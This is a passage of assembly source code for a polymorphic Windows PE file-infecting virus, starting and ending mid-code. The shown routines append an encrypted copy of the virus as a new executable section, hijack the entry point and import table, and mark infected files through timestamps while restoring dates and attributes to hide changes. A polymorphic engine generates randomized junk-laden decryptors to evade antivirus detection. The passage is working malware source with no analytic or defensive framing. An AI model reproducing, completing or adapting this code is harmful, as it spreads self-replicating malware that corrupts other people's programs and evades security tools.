Word Ptr DosHeader[18h],40h Jb Infect_F2$ Push 0h ; FileBegin Push 0h Push DWord Ptr DosHeader[3Ch] Push DWord Ptr FileHandle ; Seek to PE Header start Call SetFilePointer Cmp EAx,-1 Je Infect_F2$ Push 0h ; Read the PEHeader Lea EAx,ProcessedBytes Push EAx Push PEHeaderSize Lea EAx,PEHeader Push EAx Push DWord Ptr FileHandle Call ReadFile Or EAx,EAx Jz Infect_F2$ ; Error reading Cmp DWord Ptr ProcessedBytes,PEHeaderSize Jne Infect_F2$ ; Readed too less bytes Cmp DWord Ptr PE_Sign,'EP' Jne Infect_F2$ MovZx EAx,Word Ptr PE_NTHdrSize Add EAx,DWord Ptr DosHeader[3Ch] Add EAx,18h Mov PEFileHeaders,EAx Push 0h ; Seek to sections descr. Push 0h Push EAx Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1 ; Error seeking Je Infect_F2$ MovZx ECx,Word Ptr PE_NumOfSections Or ECx,ECx ; No sections Jz Infect_F2$ Mov EAx,SectSize Mul ECx Add EAx,PEFileHeaders Add EAx,SectSize Cmp EAx,PE_HeaderSize ; No room for new section!? Ja Infect_F2$ Mov DWord Ptr ImportLegal,0h Xor EDx,EDx MovZx ECx,Word Ptr PE_NumOfSections Infect_AS$: Inc EDx Push ECx Push EDx Push 0h ; Read the section header Lea EAx,ProcessedBytes Push EAx Push SectSize Lea EAx,Section Push EAx Push DWord Ptr FileHandle Call ReadFile Pop EDx Pop ECx Or EAx,EAx ; Error reading Jz Infect_F2$ Cmp DWord Ptr ProcessedBytes,SectSize Jne Infect_F2$ ; Readed too less bytes Cmp DWord Ptr ImportLegal,0h Jne Infect_NS$ ; Import already detected! Mov EAx,SectRVA Cmp EAx,PE_ImportTableRVA Ja Infect_NS$ Mov ImportRVA,EAx Add EAx,SectVirtSize Cmp EAx,PE_ImportTableRVA Jbe Infect_NS$ Mov EAx,SectPhysOffs Mov ImportPhysOffs,EAx Mov EAx,SectFlags Mov ImportFlags,EAx Mov ImportOrder,EDx Mov DWord Ptr ImportLegal,-1 Infect_NS$: Dec ECx Jnz Infect_AS$ Cmp DWord Ptr ImportLegal,0h Jz Infect_F2$ ; Import not found ?! Mov EAx,DWord Ptr SelfSectionName Mov SelfSectName,EAx ; SetUp self section name Mov EAx,DWord Ptr SelfSectionName+4 Mov SelfSectName+4,EAx Mov EAx,SectRVA Add EAx,SectVirtSize Mov EBx,PE_ObjectAlign Call AlignDWordOnDWord Mov SelfSectRVA,EAx ; SetUp self sect. RVA & Flags Mov DWord Ptr SelfSectFlags,0E0000040h ; R/W/E, IData Push 2h ; Seek to EOF Push 0h Push 0h Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1 Je Infect_F2$ Push EAx ; SetUp self section Mov EBx,PE_FileAlign ; Physical Offset Call AlignDWordOnDWord Mov SelfSectPhysOffs,EAx Pop EBx Sub EAx,EBx Jz Infect_NoPreA$ Push EAx ; Need file alignment Mov ECx,EAx Lea EDi,VeryLargeBuffer Cld Xor Al,Al Rep StosB Pop ECx Push ECx Push 0h Lea EAx,ProcessedBytes ; Write some null's into Push EAx ; fucking file Push ECx Lea EAx,VeryLargeBuffer Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx Pop ECx Jz Infect_F2$ Cmp ECx,ProcessedBytes Jne Infect_F2$ Infect_NoPreA$: Xor EBx,EBx Lea EDi,VeryLargeBuffer ; Transfer self to memory Mov ESi,Offset Start Infect_Trans$: Mov Al,[ESi][EBx] Mov [EDi][EBx],Al Inc EBx Cmp EBx,StubImportPlace Jb Infect_Trans$ Mov EAx,9h ; Generate the set of Call Random ; polymorphic cryptors Add EAx,8h ; in range (8..16) Mov CryptCnt,EAx Lea EAx,VeryLargeBuffer Add EAx,StubImportPlace Mov EDi,EAx Mov EAx,FixUpsCounter ; Depend on PELINK Shl EAx,2h ; tool linking strategy! Add EAx,FixUpsPlace Mov GenCrSz,EAx Xor EAx,EAx Mov GenSz,EAx Mov GenTotalSz,EAx Infect_Gen$: Add EDi,1000h ; Maximal encryptor size! Infect_Gen_A$: Lea ESi,[EDi-1000h] Mov ECx,GenCrSz Push EDi Push EAx ; Make the cryptor pairs Call GenPolyMorph Pop EAx Pop EDi Cmp EBx,1000h Ja Infect_Gen_A$ Mov Cryptors[EAx*8],EBx ; Encryptor size Mov Cryptors[EAx*8+4],EDx ; Decryptor size Add GenSz,EDx Add GenCrSz,EDx Add GenTotalSz,EDx Add GenTotalSz,EBx Xchg ESi,EDi Mov ECx,EDx Cld ; Pack cryptors Rep MovsB Inc EAx Cmp EAx,CryptCnt Jb Infect_Gen$ Lea EDi,VeryLargeBuffer Mov EBx,Here Mov ESi,FixUpsPlace Mov ECx,FixUpsCounter ; UnDo FixUps Infect_UnDo1$: Mov EAx,[ESi][EBx] Sub [EDi][EAx],EBx Add ESi,4h Dec ECx Jnz Infect_UnDo1$ Mov EAx,GenSz ; SetUp PolyMorph sizes Mov EDx,Offset PolyMorphSz Sub EDx,EBx Mov [EDi][EDx],EAx Mov EAx,PE_EntryPointRVA ; SetUp EntryPoint Mov EDx,Offset StubEntryLabel Sub EDx,EBx Mov [EDi][EDx],EAx Mov EAx,SelfSectRVA ; SetUp SelfPlace Mov EDx,Offset CurrentPlace Sub EDx,EBx Mov [EDi][EDx],EAx Mov EAx,PE_ImageBase ; SetUp ImagePlace Mov EDx,Offset ImagePlace Sub EDx,EBx Mov [EDi][EDx],EAx Mov EAx,1h ; SetUp Initialization Flag Mov EDx,Offset InitOk Sub EDx,EBx Mov [EDi][EDx],EAx Mov ESi,ImportPlace ; ReSetUp Import directory Mov ECx,ImportLength Infect_UnDo2$: Mov EDx,[ESi][EBx] ; Get LookUp pointer Sub EDx,CurrentPlace Sub EDx,PolyMorphSz Push EDx Infect_Un_2$: Mov EAx,[EDx][EBx] ; ReSetUp LookUp table Or EAx,EAx Jz Infect_Un_1$ Sub EAx,CurrentPlace Sub EAx,PolyMorphSz Add EAx,SelfSectRVA Add EAx,GenSz Mov [EDi][EDx],EAx Add EDx,4h Jmp Infect_Un_2$ Infect_Un_1$: Pop EDx Add EDx,SelfSectRVA ; ReSetUp LookUp ptr Add EDx,GenSz Mov [EDi][ESi],EDx Mov EDx,[ESi][EBx]+3*4 ; ReSetUp Name ptr Sub EDx,CurrentPlace Sub EDx,PolyMorphSz Add EDx,SelfSectRVA Add EDx,GenSz Mov [EDi][ESi]+3*4,EDx Mov EDx,[ESi][EBx]+4*4 ; ReSetUp ImprtAddress ptr Sub EDx,CurrentPlace Sub EDx,PolyMorphSz Add EDx,SelfSectRVA Add EDx,GenSz Mov [EDi][ESi]+4*4,EDx Add ESi,5*4 Sub ECx,5*4 Ja Infect_UnDo2$ Lea ESi,VeryLargeBuffer ; Crypt the self body Mov ECx,StubImportPlace ; before writing it Add ECx,GenTotalSz ; into desired file Add ESi,ECx Mov EDi,ESi Add EDi,GenSz Dec EDi Dec ESi Std ; Place buffer at Rep MovsB ; program start Mov ESi,StubImportPlace Add ESi,EDi Xor EAx,EAx Infect_Crypt$: Push EAx Mov ECx,Cryptors[EAx*8+4] Lea EBx,[ESi+1] Add ESi,ECx Add ESi,Cryptors[EAx*8] Push ESi Push EDi Std Rep MovsB Xchg EDi,[ESp] Inc EDi Push EBp Push EDi Call EBx ; Crypt by one cryptor Pop EBp Pop EDi Pop ESi Pop EAx Inc EAx Cmp EAx,CryptCnt Jb Infect_Crypt$ Cld Mov ECx,StubImportPlace Add ECx,GenSz Push ECx Push 0h ; WRITE self body Lea EAx,ProcessedBytes ; File pointer Push EAx ; must be at file EOF Push ECx Lea EAx,VeryLargeBuffer Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx ; Error writing Pop EAx Jz Infect_F2$ Cmp EAx,ProcessedBytes Jne Infect_F2$ ; Too less bytes written Mov EAx,PE_ImportTableRVA ; Calculate import place Sub EAx,ImportRVA ; in file Add EAx,ImportPhysOffs Push 0h Push 0h Push EAx Push DWord Ptr FileHandle ; And seek in file at Call SetFilePointer ; this position Cmp EAx,-1 Je Infect_F2$ ; Error seeking Lea EBx,VeryLargeBuffer Infect_Trans1$: Push EBx Push 0h Lea EAx,ProcessedBytes ; Read the next import record Push EAx Push 5*4 Push EBx Push DWord Ptr FileHandle Call ReadFile Pop EBx Or EAx,EAx Jz Infect_F2$ ; Errors. . . Cmp DWord Ptr ProcessedBytes,5*4 Jne Infect_F2$ Add EBx,5*4 ; Last import record??? Cmp DWord Ptr [EBx][3*4][-5*4],0h Jne Infect_Trans1$ Lea EAx,VeryLargeBuffer Sub EBx,EAx Push EBx Push 2h ; Seek to EOF Push 0h Push 0h Push DWord Ptr FileHandle Call SetFilePointer Pop EBx Cmp EAx,-1 ; Errors. . . Je Infect_F2$ Push EBx Push 0h ; Write all import records Lea EAx,ProcessedBytes ; to target file Push EAx Push EBx Lea EAx,VeryLargeBuffer Push EAx Push DWord Ptr FileHandle Call WriteFile Pop EBx Or EAx,EAx ; Errors. . . Jz Infect_F2$ Cmp ProcessedBytes,EBx Jne Infect_F2$ Add EBx,ImportLength ; Calculate the new import Mov PE_ImportDataSz,EBx ; size and RVA Mov EAx,SelfSectRVA Add EAx,GenSz Add EAx,ImportPlace Mov PE_ImportTableRVA,EAx Lea EDi,VeryLargeBuffer ; Generate some random trash Mov EAx,100h Call Random Lea ECx,[EAx+10h] Push ECx Cld Infect_Trash$: Mov EAx,100h Call Random StosB Dec ECx Jnz Infect_Trash$ Mov ECx,[ESp] Push 0h ; and write it into Lea EAx,ProcessedBytes ; fucking file, at them Push EAx ; end Push ECx Lea EAx,VeryLargeBuffer Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx ; Error writing! Pop EAx Jz Infect_F2$ Cmp EAx,ProcessedBytes ; Too less bytes written Jne Infect_F2$ Push 2h ; Seek to EOF Push 0h Push 0h Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1 ; Seeking failure Je Infect_F2$ Sub EAx,SelfSectPhysOffs ; SetUp self section sizes Mov SelfSectVirtSize,EAx Mov EBx,PE_FileAlign Call AlignDWordOnDWord Mov SelfSectPhysSize,EAx Sub EAx,SelfSectVirtSize Jz Infect_ToDone$ ; Need file align? Mov ECx,EAx Push ECx Mov Al,0h ; Prepare aligning buffer Cld Lea EDi,VeryLargeBuffer Rep StosB Pop ECx Push ECx ; And align the file Push 0h Lea EAx,ProcessedBytes Push EAx Push ECx Lea EAx,VeryLargeBuffer Push EAx Push DWord Ptr FileHandle Call WriteFile Pop ECx Or EAx,EAx ; Error writing! Jz Infect_F2$ Cmp DWord Ptr ProcessedBytes,ECx Jne Infect_F2$ ; Too less bytes written Infect_ToDone$: Mov EAx,SelfSectVirtSize ; SetUp memory requirement Mov EBx,PE_ObjectAlign Call AlignDWordOnDWord Add PE_ImageSize,EAx Add PE_SizeOfIData,EAx Mov EAx,SelfSectRVA ; SetUp Self EntryPoint Mov PE_EntryPointRVA,EAx Mov EAx,PE_StackReserveSz ; SetUp stack size Add EAx,MemCommitSz ; (for placing temporary Mov PE_StackReserveSz,EAx ; buffer) MovZx EAx,Word Ptr PE_NumOfSections Mov ECx,SectSize Mul ECx Add EAx,PEFileHeaders Push 0h ; Prepare to write Push 0h ; SelfSection descriptor Push EAx Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1 ; Errors. . . Je Infect_F2$ Push 0h ; And write it! Lea EAx,ProcessedBytes Push EAx Push SelfSectSize Lea EAx,SelfSection Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx Jz Infect_F2$ ; Errors. . . Cmp DWord Ptr ProcessedBytes,SelfSectSize Jne Infect_F2$ Mov ECx,DWord Ptr ImportOrder Mov EAx,SectSize ; Prepare to write import Mul ECx ; section flags Add EAx,PEFileHeaders ; Warning!!! Sub EAx,4h ; Import section Flags Push 0h ; is the LAST field in Push 0h ; section header structure Push EAx ; !!!!!!!!!!!!!!!!!!!!!!!! Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1h ; Seeking failure Je Infect_F2$ Or DWord Ptr ImportFlags,0C0000000h Push 0h ; Enable reading Lea EAx,ProcessedBytes ; and writing Push EAx ; in Import section Push 4h Lea EAx,ImportFlags Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx Jz Infect_F2$ ; Errors. . . Cmp DWord Ptr ProcessedBytes,4h Jne Infect_F2$ Inc Word Ptr PE_NumOfSections ; New # of sections Push 0h ; Prepare to writing Push 0h ; PE header Push DWord Ptr DosHeader[3Ch] Push DWord Ptr FileHandle Call SetFilePointer Cmp EAx,-1 Je Infect_F2$ Push 0h Lea EAx,ProcessedBytes Push EAx Push PEHeaderSize ; And write it Lea EAx,PEHeader Push EAx Push DWord Ptr FileHandle Call WriteFile Or EAx,EAx Jz Infect_F2$ ; Errors. . . Cmp DWord Ptr ProcessedBytes,PEHeaderSize Jne Infect_F2$ Mov Ax,NewSeconds ; Ok! Set infection flag. Mov FT_Second,Ax Lea EAx,FileLastWrite Push EAx Lea EAx,FT_Struc Push EAx Call SystemTimeToFileTime Infect_F2$: Lea EAx,FileLastWrite ; Restore file Date/Time Push EAx Lea EAx,FileLastAccess Push EAx Lea EAx,FileCreation Push EAx Push DWord Ptr FileHandle Call SetFileTime Push DWord Ptr FileHandle ; Close our file. Ooh, Yes! Call CloseHandle Infect_F1$: Push DWord Ptr FileAttributes; Restore file attributes Push DWord Ptr FileNamePtr Call SetFileAttributesA Infect_F0$: Push MemCommitSz/4h Call FreeStackMem Ret ; --------------------------------------------------------- ; Service routines ; AllocStackMem: Pop EAx ; Allocate memory in Stack Pop ECx ; Corrupt EAx,ECx !!! Push EBp ; Do not use call stack AllocStack_1$: Push 0h ; before this call Dec ECx Jnz AllocStack_1$ Mov EBp,ESp Push EAx Ret FreeStackMem: Pop EAx ; Free memory in Stack Pop ECx ; Corrupt EAx,ECx !!! FreeStack_1$: Pop DropDWord ; Do not use stack Dec ECx ; memory after this call Jnz FreeStack_1$ Pop EBp Push EAx Ret DropDWord Dd ? AlignDWordOnDWord: Push EDx Xor EDx,EDx ; Align EAx by EBx boundary Push EAx Div EBx Pop EAx Or EDx,EDx Jz AlignDWord_0$ Sub EAx,EDx Add EAx,EBx AlignDWord_0$: Pop EDx Ret ; --------------------------------------------------------- ; My string converter ;-) ConvertStr: Cld ; Convert some string Call InitConverter ; in EDx with Mov ESi,EDx ; possibly length in ECx Lea EDi,SmallBuffer ; (Corrupt EDi,ESi,EAx) Push ESi Push EDi Push ECx Push EBx Cmp ECx,-1h Je Convert_Mode1$ Or ECx,ECx Jz Convert_Done$ Convert_Mode0$: Call ProcessChar ; Counter mode Dec ECx Jnz Convert_Mode0$ Pop EBx Pop ECx Pop EDx Pop ECx Mov Byte Ptr Es:[EDi],0h Sub EDi,EDx Mov ECx,EDi Ret Convert_Mode1$: Call ProcessChar ; ASCIZ mode Cmp Byte Ptr [ESi][-1],0h Jne Convert_Mode1$ Pop EBx Pop ECx Pop EDx Pop EAx Ret Convert_Done$: Pop EBx Pop ECx Pop EDi Pop ESi Mov Byte Ptr Es:[EDi],0h Ret ProcessChar: LodsB ; Process one char, empty StosB ; strings are not allowed!!! Cmp Al,'a' Jb Process_1$ ; UpCase the source char Cmp Al,'z' Ja Process_1$ Sub Al,20h Process_1$: Push ECx Push EBx Push EDx Mov ECx,ConvertDataLen Xor EBx,EBx ; Try the some variants Process_Again$: Mov EDx,[EBx*4]ConvertVar Mov Ah,[EDx] Inc DWord Ptr [EBx*4]ConvertVar Cmp Al,Ah ; Good char? Jne Process_Bad$ Cmp Byte Ptr [EDx][1],0h ; Last char in variant? Jne Process_Next$ Sub EDx,[EBx*8][ConvertData] Sub EDi,EDx ; Make the replacing Dec EDi Push ESi Mov ESi,[EBx*8+4][ConvertData] Process_Do$: LodsB ; Transfer the real string StosB ; converted by me ;-) Cmp Al,0h Jne Process_Do$ Dec EDi Pop ESi Push DWord Ptr [EBx*8][ConvertData] Pop DWord Ptr [EBx*4]ConvertVar Jmp Process_Ok$ Process_Bad$: Push DWord Ptr [EBx*8][ConvertData] Pop DWord Ptr [EBx*4]ConvertVar Process_Next$: Inc EBx ; Next variant Dec ECx Jnz Process_Again$ Process_Ok$: Pop EDx ; Char has been processed Pop EBx Pop ECx Ret InitConverter: Push EBx ; InitConverter routines Push ECx Mov ECx,ConvertDataLen Xor EBx,EBx InitConv_1$: Push DWord Ptr [EBx*8][ConvertData] Pop DWord Ptr [EBx*4]ConvertVar Inc EBx Dec ECx Jnz InitConv_1$ Pop ECx Pop EBx Ret Transfer_Str: Cmp ECx,-1h ; More strict strings Je Transfer_S_M$ ; moving routine Or ECx,ECx Jz Transfer_S_D$ Rep MovsB Transfer_S_D$: Xor Al,Al StosB Ret Transfer_S_M$: LodsB StosB Or Al,Al Jnz Transfer_S_M$ Ret ; --------------------------------------------------------- ; The PolyMorph code has the such structure: ; PushA ; Call Start ; ... ; Sem: Dd 1h ; ... ; Start: Pop BaseReg ; Xor SemReg,SemReg (And SemReg,0) (Mov SemReg,0) ; LockSem: Xchg [BaseReg][Sem],SemReg ; Or SemReg,SemReg (Test SemReg,SemReg) (And SemReg,SemReg) ; Jz LockSem ; Cmp SemReg,2h ; Je Done ; Add BaseReg,CodeStart ; Add [BaseReg][Border],BaseReg ; .LoadRegisters ; Again: .Decrypt ; Add Base,4h (Inc Base) 4 times ; Cmp Base,Border ; Jb Again ; Sub BaseReg,CodeStart+CodeSize ; Done: Mov [BaseReg][Sem],2h ; PopA ; CodeStart: ; ; All code mixed with trash. . . Prepare to understand! GenPolyMorph: Push ESi Push EDi Push ECx Call GetNoESpReg ; Choose the 2 base Mov pBaseReg,Al ; registers Mov Bl,Al ; Base GenPolyM_R$: Call GetNoESpReg Cmp Bl,Al Je GenPolyM_R$ Mov pSemReg,Al ; and Semaphore Mov Byte Ptr pEnableEncr,0h Mov ECx,5h Mov EBx,Offset GenNoRegCom Call Enumer Mov Al,60h ; PushA StosB Mov Ax,-1h Mov EBx,Offset GenAnyCom Call Enumer Mov Al,0E8h ; Call $+... StosB Mov EAx,50h Call Random Add EAx,10h Push EAx StosD Mov pBase,EDi Mov ECx,EAx GenPolyM_C$: Mov EAx,100h Call Random StosB Dec ECx Jnz GenPolyM_C$ Pop EAx Sub EAx,4h Call Random Mov pSem,EAx Add EAx,pBase ; SetUp semaphore Mov DWord Ptr [EAx],1h Mov Al,pBaseReg ; Pop BaseReg Or Al,58h StosB Mov Ah,-1h Mov Al,pBaseReg Mov ECx,5h Mov EBx,Offset GenAnyCom Call Enumer Mov EAx,2h ; Xor SemReg,SemReg Call Random Or Al,Al Jz GenPolyM_X$ Mov Al,2h Call Random Or Al,Al Jz GenPolyM_XM$ Mov Al,81h ; (And) StosB Mov Al,pSemReg Or Al,0E0h StosB Xor EAx,EAx StosD Jmp GenPolyM_XD$ GenPolyM_XM$: Mov Al,0B8h ; (Mov) Or Al,pSemReg StosB Xor EAx,EAx StosD Jmp GenPolyM_XD$ GenPolyM_X$: Mov Al,2h ; (Xor) Call Random Add EAx,EAx Or Al,31h StosB Mov Al,pSemReg Shl Al,3h Or Al,pSemReg Or Al,0C0h StosB GenPolyM_XD$: Mov Al,pSemReg Mov Ah,pBaseReg Call Enumer Mov pXchg,EDi Mov Al,87h ; Xchg SemReg,[BaseReg][Sem] StosB Mov Al,pSemReg Shl Al,3h Or Al,80h Or Al,pBaseReg StosB Mov EAx,pSem StosD Mov Al,pBaseReg Mov Ah,pSemReg Call Enumer Mov EAx,4h ; Or SemReg,SemReg Call Random Jz GenPolyM_OC$ Mov Al,3h ; (And) (Test) (Or) Call Random Shl Al,3h Mov Cl,Al Mov EAx,092185h Shr EAx,Cl Cmp Al,85h Je GenPolyM_O$ Push EAx Mov EAx,2h Call Random Or Al,Al Pop EAx Jz GenPolyM_O$ Or Al,2h GenPolyM_O$: StosB Mov Al,pSemReg Shl Al,3h Or Al,pSemReg Or Al,0C0h StosB Jmp GenPolyM_OD$ GenPolyM_OC$: Mov Al,83h ; (Cmp) StosB Mov Al,pSemReg Or Al,38h Or Al,0C0h StosB Xor Al,Al StosB GenPolyM_OD$: Mov ECx,5h Mov EBx,Offset GenNoFlagCom Call Enumer Mov Ax,840Fh ; Jz LockSem StosW Mov EAx,pXchg Sub EAx,4h Sub EAx,EDi StosD Mov Al,pBaseReg Mov Ah,pSemReg Mov EBx,Offset GenAnyCom Call Enumer Mov Al,83h ; Cmp SemReg,2h StosB Mov Al,pSemReg Or Al,0F8h StosB Mov Al,2h StosB Mov EBx,Offset GenNoFlagCom Call Enumer Mov Ax,840Fh ; Jz Done StosW Mov pMov,EDi StosD Mov Al,pBaseReg Mov Ah,-1h Mov EBx,Offset GenAnyCom Call Enumer Mov Al,81h ; Add BaseReg,CodeStart StosB Mov Al,pBaseReg Or Al,0C0h StosB Mov pBaseAdd,EDi StosD Mov Al,pBaseReg Mov Ah,-1h Call ENumer Mov Al,1h ; Add [BaseReg][Brdr],BaseReg StosB Mov Al,pBaseReg Shl Al,3h Or Al,80h Or Al,pBaseReg StosB Mov pAdd,EDi StosD Mov Al,pBaseReg Mov Ah,-1h Call Enumer Mov Byte Ptr pEnableEncr,1h Mov Al,pBaseReg ; Encryptor, Pop BaseReg Or Al,58h Call StoreByte Mov Al,87h ; Encryptor, Call StoreByte ; Xchg BaseReg,[ESp] Mov Al,pBaseReg Shl Al,3h Or Al,4h Call StoreByte Mov Al,24h Call StoreByte Mov Al,68h ; Encryptor, Push EncrSize Call StoreByte Mov EAx,[ESp] Sub EAx,4h Call StoreDWord Mov EDx,1h ; .LoadRegisters Mov Cl,pBaseReg Shl EDx,Cl Or EDx,10h Mov Al,pBaseReg Mov Ah,-1h GenPolyM_L$: Push EAx Call GenMovCom Mov EAx,2h Call Random Or Al,Al Pop EAx Jz GenPolyM_L1$ Push EAx Call GenNoRegCom Pop EAx GenPolyM_L1$: Cmp EDx,0FFh Jne GenPolyM_L$ Mov ECx,5h Mov EBx,Offset GenNoRegCom Call Enumer Mov Al,1h ; Encryptor, Border SetUp Call StoreByte ; Add [ESp],BaseReg Mov Al,pBaseReg Shl Al,3h Or Al,4h Call StoreByte Mov Al,24h Call StoreByte Mov pAgain,EDi Mov pAgain_E,ESi Mov EAx,40h ; 10h..50h commands Call Random Add EAx,10h Mov ECx,EAx GenPolyM_G0$: Mov EAx,3h ; .Decrypt Call Random Or Al,Al Mov Al,pBaseReg Mov Ah,-1h Jnz GenPolyM_G1$ Call GenArCom Jmp GenPolyM_G2$ GenPolyM_G1$: Call GenArMemCom GenPolyM_G2$: Dec ECx Jnz GenPolyM_G0$ Mov EAx,2h ; Add BaseReg,4h Call Random Or Al,Al Jz GenPolyM_I2$ Mov Al,pBaseReg ; (Inc) Or Al,40h Mov ECx,4h GenPolyM_I1$: StosB Call StoreByte Push EAx Call GenNoRegCom Pop EAx Dec ECx Jnz GenPolyM_I1$ Jmp GenPolyM_I3$ GenPolyM_I2$: Mov Al,83h ; (Add) StosB Call StoreByte Mov Al,pBaseReg Or Al,0C0h StosB Call StoreByte Mov Al,4h StosB Call StoreByte GenpolyM_I3$: Mov ECx,5h Mov EBx,Offset GenArCom Mov Al,pBaseReg Mov Ah,-1h Call Enumer Mov Al,81h ; Cmp BaseReg,Limit StosB Mov Al,pBaseReg Or Al,0F8h StosB Mov EAx,EDi Sub EAx,pBase Mov EBx,pAdd Mov [EBx],EAx ; 1pass Complete Add command Mov EAx,[ESp] Sub EAx,4h StosD Mov Al,3Bh ; Encryptor, Border check Call StoreByte ; Cmp BaseReg,[ESp] Mov Al,pBaseReg Shl Al,3h Or Al,4h Call StoreByte Mov Al,24h Call StoreByte Mov EBx,Offset GenNoFlagCom Call Enumer Mov Ax,820Fh StosW Call StoreWord Mov EAx,pAgain ; Complete Jmp Again commands Sub EAx,EDi Sub EAx,4h StosD Mov EAx,pAgain_E Sub EAx,ESi Sub EAx,4h Call StoreDWord Mov Al,58h ; Complete encryptor Call StoreByte Mov Al,0C3h Call StoreByte Mov Byte Ptr pEnableEncr,0h Mov EBx,Offset GenAnyCom Mov Al,pBaseReg Mov Ah,-1h Call Enumer Mov Al,81h ; Sub BaseReg,CodeSize StosB Mov Al,pBaseReg Or Al,0E8h StosB Mov pBaseSub,EDi StosD Mov Al,pBaseReg Mov Ah,-1h Call Enumer Mov Al,0C7h ; Mov [BaseReg][Sem],2h StosB Mov Al,pBaseReg Or Al,80h StosB Mov EAx,pSem StosD Mov EAx,2h StosD Mov EAx,EDi ; Complete Jmp Done command Sub EAx,pMov Sub EAx,4h Mov EBx,pMov Mov [EBx],EAx Mov EBx,Offset GenAnyCom Mov Ax,-1h Call Enumer Mov Al,61h ; PopA StosB Mov EBx,Offset GenNoRegCom Call Enumer Mov EAx,EDi ; Complete Base To Body SetUp Sub EAx,pBase Mov EBx,pBaseAdd Mov [EBx],EAx Mov EBx,pAdd ; 2pass Complete Add command Sub [EBx],EAx Mov EBx,[ESp] ; Backward Body to Base SetUp Dec EBx And Bl,0FCh ; Rounded by 4h Add EAx,EBx Mov EBx,pBaseSub Mov [EBx],EAx Pop ECx Mov EDx,EDi ; All done successfully! Sub EDx,[ESp] ; EDx - decryptor size Mov EBx,ESi Sub EBx,[ESp][4] ; EBx - encryptor size Add ESp,8h Ret ; --------------------------------------------------------- GenArMemCom: Push EAx ; Some command that Mov EAx,2h ; change memory by Call Random ; base in EAx (Al) Or Al,Al Jz GenArMem_Imm$ Mov Al,2h ; Add; Sub (Reg) Call Random Or Al,Al Jz GenArMem_R_1$ Mov Al,28h GenArMem_R_1$: Or Al,1h StosB Xor Al,28h Call StoreByte Pop EAx Push EBx Mov EBx,EAx GenArMem_R_2$: Call GetNoESpReg Cmp Al,Bl Je GenArMem_R_2$ Cmp Al,Bh Je GenArMem_R_2$ Shl Al,3h Or Al,Bl Pop EBx Mov Ah,Al Call GenArMem_Comp$ Ret GenArMem_Imm$: Mov Al,2h ; Add; Sub (Imm) Call Random Add Al,Al Or Al,81h StosB Call StoreByte Xchg EAx,[ESp] Push EAx Mov Al,2h Call Random Or Al,Al Pop EAx Jz GenArmem_I_1$ Or Al,28h GenArMem_I_1$: Mov Ah,Al Xor Ah,28h Call GenArMem_Comp$ Pop EAx Cmp Al,83h Jne GenArMem_I_2$ Mov Ax,100h ; Byte operand Call Random StosB Call StoreByte Ret GenArMem_I_2$: Mov EAx,RandSeed ; DWord operand StosD Call StoreDWord Ret GenArMem_Comp$: Push EAx ; Compile addressing And Al,7h ; modes (Corrupt EAx) Cmp Al,4h Je GenArMem_C_1$ Cmp Al,5h Je GenArMem_C_2$ Pop EAx StosB GenArMem_C0$: Mov Al,Ah Push EAx And Al,7h Cmp Al,4h Je GenArMem_C_3$ Cmp Al,5h Je GenArMem_C_4$ Pop EAx Call StoreByte Ret GenArMem_C_1$: Pop EAx ; [ESp] StosB Mov Al,24h StosB Jmp GenArMem_C0$ GenArMem_C_2$: Pop EAx ; [EBp] Or Al,40h And Al,0FEh StosB Mov Al,25h StosB Mov Al,0h StosB Jmp GenArMem_C0$ GenArMem_C_3$: Pop EAx ; [ESp] Call StoreByte Mov Al,24h Call StoreByte Ret GenArMem_C_4$: Pop EAx ; [EBp] Or Al,40h And Al,0FEh Call StoreByte Mov Al,25h Call StoreByte Mov Al,0h Call StoreByte Ret ; --------------------------------------------------------- GenAnyCom: Push EAx Push EBx ; Some command that Push EDx ; changes registers Mov EBx,EAx ; but don't change some GenAnyCom_0_1$: Call GetNoESpReg ; registers by # in Ax (Ah,Al) Cmp Al,Bl ; (Corrupt EAx) Je GenAnyCom_0_1$ Cmp Al,Bh Je GenAnyCom_0_1$ Mov Dl,Al GenAnyCom_0_2$: Call GetNoESpReg Cmp Al,Bl Je GenAnyCom_0_2$ Cmp Al,Bh Je GenAnyCom_0_2$ Mov Ah,Dl Pop EDx Pop EBx Push EAx Mov EAx,0Ch Call Random Or EAx,EAx Jnz GenAnyCom_1$ ; ">0" Pop EAx ; Ar command Pop EAx Jmp GenArCom GenAnyCom_1$: Dec EAx Jnz GenAnyCom_2$ ; ">1" Pop EAx ; Mov/Lea command Pop EAx Push EDx Call GenMovCom Pop EDx Ret GenAnyCom_2$: Dec EAx Jnz GenAnyCom_3$ ; ">2" Pop EAx ; Cbw; Cwde Pop EAx Or Al,Al Jz GenAnyCom Or Ah,Ah Jz GenAnyCom Mov EAx,2h Call Random Or Al,Al Jz GenAnyCom_2_1$ Mov Al,66h StosB GenAnyCom_2_1$: Mov Al,98h StosB Ret GenAnyCom_3$: Dec EAx Jnz GenAnyCom_4$ ; ">3" Pop EAx ; Cwd; Cdq Pop EAx Or Al,Al Jz GenAnyCom Or Ah,Ah Jz GenAnyCom Cmp Al,2h Je GenAnyCom Cmp Ah,2h Je GenAnyCom Mov EAx,2h Call Random Or Al,Al Jz GenAnyCom_3_1$ Mov Al,66h StosB GenAnyCom_3_1$: Mov Al,99h StosB Ret GenAnyCom_4$: Dec EAx Jnz GenAnyCom_5$ ; ">4" Pop EAx ; Aas; Aaa; Daa; Das Pop EAx Or Al,Al Jz GenAnyCom Or Ah,Ah Jz GenAnyCom Mov EAx,4h Call Random Shl Al,3h Or Al,27h StosB Ret GenAnyCom_5$: Dec EAx Jnz GenAnyCom_6$ ; ">5" Pop EAx ; Aad; Aam Pop EAx ; operand must be <>0 Or Al,Al Jz GenAnyCom Or Ah,Ah Jz GenAnyCom Mov EAx,2h Call Random Or Al,0D4h StosB Mov Al,0FFh Call Random Inc Al StosB Ret GenAnyCom_6$: Dec EAx Jnz GenAnyCom_7$ ; ">6" Pop EAx ; Loop $+2 Pop EAx Cmp Al,1h Je GenAnyCom Cmp Ah,1h Je GenAnyCom Mov 